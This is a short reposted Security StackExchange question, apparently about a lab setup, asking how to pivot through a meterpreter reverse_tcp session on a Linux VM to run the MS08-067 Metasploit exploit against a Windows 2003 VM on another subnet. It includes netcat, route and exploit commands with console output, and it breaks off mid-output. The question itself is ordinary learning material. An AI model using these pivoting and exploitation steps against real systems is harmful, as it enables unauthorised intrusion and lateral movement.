Monday, 9 October 2017

Pivoting with Metasploit

Source: security.stackexchange.com --- Sunday, October 08, 2017
I am trying to exploit a Windows VM on a different subnet behind a dual home Linux VM where I already have a shell. To keep it simple, I have a meterpreter reverse_tcp shell on the Linux VM (192.168.47.144) and the Windows VM (192.168.128.133) is 2003 and vulnerable to MS08-067 (I tested this directly). Lastly, the Linux VM can definitely hit the SMB service on the Windows VM.

    ubuntu:~$ ip -o addr show | grep -o '192.168.47.144' && nc -nvv 192.168.128.133 445
    192.168.47.144
    Connection to 192.168.128.133 445 port [tcp/*] succeeded!

The meterpreter reverse_tcp shell on the Linux VM connects back on port 5555 so there is not a conflict with port number.

    [*] Sending stage (826872 bytes) to 192.168.47.144
    [*] Meterpreter session 2 opened (192.168.47.136:5555 -> 192.168.47.144:47395) at 2017-10-08 11:21:30 -0500
    msf exploit(handler) > use exploit/Windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > route add 192.168.128.0 255.255.255.0 2
    [*] Route added
    msf exploit(ms08_067_netapi) > route

    IPv4 Active Routing Table
    =========================

       Subnet             Netmask            Gateway
       ------             -------            -------
       192.168.128.0      255.255.255.0      Session 2

    [*] There are currently no IPv6 routes defined.
    msf exploit(ms08_067_netapi) > set RHOST 192.168.128.133
    RHOST => 192.168.128.133
    msf exploit(ms08_067_netapi) > exploit

    [*] Started reverse TCP handler on 192.168.47.136:4444
    [*] 192.168.128.133:445 - Automatically detecting the target...
    [*] 192.168.128.133:445 ...



from Windows http://ift.tt/2g2KPIo
